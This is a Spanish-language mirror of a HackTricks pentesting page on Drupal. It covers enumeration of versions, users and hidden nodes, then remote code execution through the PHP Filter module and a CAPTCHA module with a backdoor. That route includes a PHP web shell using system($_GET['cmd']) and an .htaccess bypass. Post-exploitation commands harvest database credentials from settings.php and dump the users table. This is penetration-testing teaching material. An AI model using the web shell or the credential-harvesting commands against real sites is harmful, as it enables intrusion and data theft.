mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 16:39:32 +00:00
176 lines
9.7 KiB
Markdown
176 lines
9.7 KiB
Markdown
# Drupal
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## Descubrimiento
|
|
|
|
* Verifica **meta**
|
|
```bash
|
|
curl https://www.drupal.org/ | grep 'content="Drupal'
|
|
```
|
|
* **Nodo**: Drupal **indexa su contenido utilizando nodos**. Un nodo puede **contener cualquier cosa** como una publicación de blog, encuesta, artículo, etc. Las URIs de página suelen tener la forma `/node/<nodeid>`.
|
|
```bash
|
|
curl drupal-site.com/node/1
|
|
```
|
|
## Enumeración
|
|
|
|
Drupal admite **tres tipos de usuarios** de forma predeterminada:
|
|
|
|
1. **`Administrador`**: Este usuario tiene control completo sobre el sitio web de Drupal.
|
|
2. **`Usuario autenticado`**: Estos usuarios pueden iniciar sesión en el sitio web y realizar operaciones como agregar y editar artículos según sus permisos.
|
|
3. **`Anónimo`**: Todos los visitantes del sitio web se designan como anónimos. Por defecto, a estos usuarios solo se les permite leer publicaciones.
|
|
|
|
### Versión
|
|
|
|
* Verificar `/CHANGELOG.txt`
|
|
```bash
|
|
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""
|
|
|
|
Drupal 7.57, 2018-02-21
|
|
```
|
|
{% hint style="info" %}
|
|
Las instalaciones más recientes de Drupal por defecto bloquean el acceso a los archivos `CHANGELOG.txt` y `README.txt`.
|
|
{% endhint %}
|
|
|
|
### Enumeración de nombres de usuario
|
|
|
|
#### Registro
|
|
|
|
En _/user/register_ simplemente intenta crear un nombre de usuario y si el nombre ya está tomado, se notificará:
|
|
|
|
![](<../../.gitbook/assets/image (254).png>)
|
|
|
|
#### Solicitar nueva contraseña
|
|
|
|
Si solicitas una nueva contraseña para un nombre de usuario existente:
|
|
|
|
![](<../../.gitbook/assets/image (255).png>)
|
|
|
|
Si solicitas una nueva contraseña para un nombre de usuario que no existe:
|
|
|
|
![](<../../.gitbook/assets/image (256).png>)
|
|
|
|
### Obtener número de usuarios
|
|
|
|
Accediendo a _/user/\<number>_ puedes ver el número de usuarios existentes, en este caso es 2 ya que _/users/3_ devuelve un error de no encontrado:
|
|
|
|
![](<../../.gitbook/assets/image (257).png>)
|
|
|
|
![](<../../.gitbook/assets/image (227) (1) (1).png>)
|
|
|
|
### Páginas ocultas
|
|
|
|
**Fuzz `/node/$` donde `$` es un número** (del 1 al 500, por ejemplo).\
|
|
Podrías encontrar **páginas ocultas** (de prueba, desarrollo) que no están referenciadas por los motores de búsqueda.
|
|
|
|
#### Información de los módulos instalados
|
|
```bash
|
|
#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
|
|
#Get info on installed modules
|
|
curl https://example.com/config/sync/core.extension.yml
|
|
curl https://example.com/core/core.services.yml
|
|
|
|
# Download content from files exposed in the previous step
|
|
curl https://example.com/config/sync/swiftmailer.transport.yml
|
|
```
|
|
### Automático
|
|
```bash
|
|
droopescan scan drupal -u http://drupal-site.local
|
|
```
|
|
## RCE
|
|
|
|
### Con el módulo PHP Filter
|
|
|
|
{% hint style="warning" %}
|
|
En versiones antiguas de Drupal **(antes de la versión 8)**, era posible iniciar sesión como administrador y **habilitar el módulo `PHP filter`**, que "permite evaluar fragmentos de código PHP incrustados".
|
|
{% endhint %}
|
|
|
|
Necesitas que el **plugin php esté instalado** (verifica accediendo a _/modules/php_ y si devuelve un **403**, entonces **existe**, si **no se encuentra**, entonces **el plugin php no está instalado**)
|
|
|
|
Ve a _Módulos_ -> (**Verifica**) _PHP Filter_ -> _Guardar configuración_
|
|
|
|
![](<../../.gitbook/assets/image (247) (1).png>)
|
|
|
|
Luego haz clic en _Agregar contenido_ -> Selecciona _Página básica_ o _Artículo_ -> Escribe _código shell php en el cuerpo_ -> Selecciona _Código PHP_ en _Formato de texto_ -> Selecciona _Vista previa_
|
|
|
|
![](<../../.gitbook/assets/image (253) (1).png>)
|
|
|
|
Finalmente, solo accede al nodo recién creado:
|
|
```bash
|
|
curl http://drupal-site.local/node/3
|
|
```
|
|
### Instalar el Módulo de Filtro PHP
|
|
|
|
A partir de la versión **8 en adelante, el** [**Módulo de Filtro PHP**](https://www.drupal.org/project/php/releases/8.x-1.1) **no se instala por defecto**. Para aprovechar esta funcionalidad, tendríamos que **instalar el módulo nosotros mismos**.
|
|
|
|
1. Descargue la versión más reciente del módulo desde el sitio web de Drupal.
|
|
1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
|
|
2. Una vez descargado, vaya a **`Administración`** > **`Informes`** > **`Actualizaciones disponibles`**.
|
|
3. Haga clic en **`Examinar`**`,` seleccione el archivo del directorio donde lo descargamos y luego haga clic en **`Instalar`**.
|
|
4. Una vez instalado el módulo, podemos hacer clic en **`Contenido`** y **crear una nueva página básica**, similar a como lo hicimos en el ejemplo de Drupal 7. Nuevamente, asegúrese de **seleccionar `Código PHP` desde el menú desplegable `Formato de texto`**.
|
|
|
|
### Módulo con Puerta Trasera
|
|
|
|
Un módulo con puerta trasera se puede crear **agregando una shell a un módulo existente**. Los módulos se pueden encontrar en el sitio web drupal.org. Elija un módulo como [CAPTCHA](https://www.drupal.org/project/captcha). Desplácese hacia abajo y copie el enlace para el archivo tar.gz [archivo](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
|
|
|
|
* Descargue el archivo y extraiga su contenido.
|
|
```
|
|
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
|
|
tar xvf captcha-8.x-1.2.tar.gz
|
|
```
|
|
* Crear una **shell web PHP** con el contenido:
|
|
```php
|
|
<?php
|
|
system($_GET["cmd"]);
|
|
?>
|
|
```
|
|
* A continuación, necesitamos crear un archivo **`.htaccess`** para darnos acceso a la carpeta. Esto es necesario ya que Drupal niega el acceso directo a la carpeta **`/modules`**.
|
|
```html
|
|
<IfModule mod_rewrite.c>
|
|
RewriteEngine On
|
|
RewriteBase /
|
|
</IfModule>
|
|
```
|
|
* La configuración anterior aplicará reglas para la carpeta / cuando solicitemos un archivo en /modules. Copie ambos archivos a la carpeta captcha y cree un archivo comprimido.
|
|
```bash
|
|
mv shell.php .htaccess captcha
|
|
tar cvf captcha.tar.gz captcha/
|
|
```
|
|
* Suponiendo que tenemos **acceso administrativo** al sitio web, haga clic en **`Administrar`** y luego en **`Extender`** en la barra lateral. A continuación, haga clic en el botón **`+ Instalar nuevo módulo`**, y se nos llevará a la página de instalación, como `http://drupal-site.local/admin/modules/install`. Busque el archivo de Captcha con puerta trasera y haga clic en **`Instalar`**.
|
|
* Una vez que la instalación tenga éxito, navegue hasta **`/modules/captcha/shell.php`** para ejecutar comandos.
|
|
|
|
## Post Explotación
|
|
|
|
### Leer settings.php
|
|
```
|
|
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
|
|
```
|
|
### Volcar usuarios de la base de datos
|
|
```
|
|
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
|
|
```
|
|
## Referencias
|
|
|
|
* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PR a los repositorios de** [**hacktricks**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|